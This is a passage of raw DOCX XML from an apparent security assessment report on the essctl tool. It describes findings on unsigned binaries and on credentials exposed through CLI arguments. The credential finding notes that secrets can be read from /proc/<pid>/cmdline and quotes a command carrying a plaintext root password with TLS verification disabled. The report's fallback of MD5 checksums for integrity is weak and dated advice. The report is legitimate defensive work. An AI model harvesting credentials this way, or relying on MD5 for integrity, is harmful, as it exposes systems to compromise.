      <w:bookmarkEnd w:id="48"/>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000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9410"/>
      </w:tblGrid>
      <w:tr w:rsidR="009604BC" w14:paraId="2BA691BF" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0001E9DD" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="647584EC" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>File on the system are not digitally signed, therefore the integrity of the software cannot be guaranteed. This issue can be exploited to activate malicious program functionality by circumventing system and application integrity routines.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B793013" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4335FE2D" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">Reference : </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E843F68" w14:textId="17808E23" w:rsidR="009604BC" w:rsidRDefault="00000000" w:rsidP="006F2F0C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1B00FF"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>https://en.wikipedia.org/wiki/Code_signing</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3281765D" w14:textId="417A2494" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="distribute"/>
            </w:pPr>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A9DDC04" wp14:editId="7821BDC5">
                  <wp:extent cx="5930900" cy="2703444"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="21" name="Drawing 21" descr="workitemimagea"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="Picture 21" descr="workitemimagea"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId73"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5949106" cy="2711743"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="49380684" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30321C90" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Affected URL/API(s)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D7E816E" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>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w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>lpp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>mmfs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>essctl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="09C039C6" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="055EE094" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Vulnerability Impact</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23DA5373" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>The system allows an attacker to modify executables related to system functionality. The program can be modified to subvert authentication checks or to add malicious functionality.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="72163D49" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E750FFC" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Fix Recommendation / Mitigation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BF31315" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Digitally sign the software to make it more difficult for an attacker to modify. As a best </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>practice, sign both the installer and the main executable of the application.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="172FF2FC" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="258965AC" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>2. If using digital signatures is not an option, use an MD5 signature and have the user check that the signature of the software they are about to load matches the signature expected. The expected signature should be computed by the release team after the new release is built.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="230E2CD6" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="71DACDCE" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>3. The private key used to sign development releases, and the private key used to sign production releases should be completely separate and access to the production release private key should be highly restricted.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5A3A179F" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
      <w:pPr>
        <w:pStyle w:val="heading3"/>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId74" w:anchor="action=com.ibm.team.workitem.viewWorkItem&amp;id=195171">
        <w:bookmarkStart w:id="49" w:name="_Toc200562853"/>
        <w:r>
          <w:rPr>
            <w:b/>
            <w:sz w:val="36"/>
          </w:rPr>
          <w:t>195171: Sensitive Information Passed In CLI Arguments</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="C1BABA"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Informational)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>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000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9410"/>
      </w:tblGrid>
      <w:tr w:rsidR="009604BC" w14:paraId="4A87188C" w14:textId="77777777" w:rsidTr="00DB00AB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01A92394" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50C69F0F" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Passing sensitive information as command line arguments poses a security issue as these information can be accessed by any user either through the bash history or by reading "/proc/&lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>pid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>&gt;/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>cmdline</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>".</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ED0E86D" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5F718B11" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">It is observed that sensitive information like "Username" and "Password"  can be passed as command line arguments via </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>essctl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> commands</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21F0F38E" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="33BC4309" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Below are the related screenshot:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24ED9C04" w14:textId="5BF7FD2B" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="distribute"/>
            </w:pPr>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4625127E" wp14:editId="27D93D67">
                  <wp:extent cx="5930900" cy="2838616"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="22" name="Drawing 22" descr="workitemimagea"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="Picture 22" descr="workitemimagea"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId75"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5935438" cy="2840788"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A2BB136" wp14:editId="11649D6C">
                  <wp:extent cx="5930900" cy="2711394"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="23" name="Drawing 23" descr="workitemimagea"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="Picture 23" descr="workitemimagea"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId76"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5940045" cy="2715575"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="7D1D842B" w14:textId="77777777" w:rsidTr="00DB00AB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BC59D8F" w14:textId="7CE2749D" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Affected </w:t>
            </w:r>
            <w:r w:rsidR="002A4CF4">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>CLI</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>/API(s)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="273A439A" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000" w:rsidP="000C5CD8">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:after="0"/>
              <w:ind w:hanging="176"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>usr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>lpp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>mmfs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>essctl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>essmgmt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> copy-ssh-id --hostname </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>utilityBareMetal</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> --password cluster --username root --</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>utilityBareMetal</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> --insecure-skip-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>tls</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>-verify</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01403DD2" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000" w:rsidP="000C5CD8">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:after="0"/>
              <w:ind w:hanging="176"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>usr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>lpp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>mmfs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>essctl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>essmgmt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
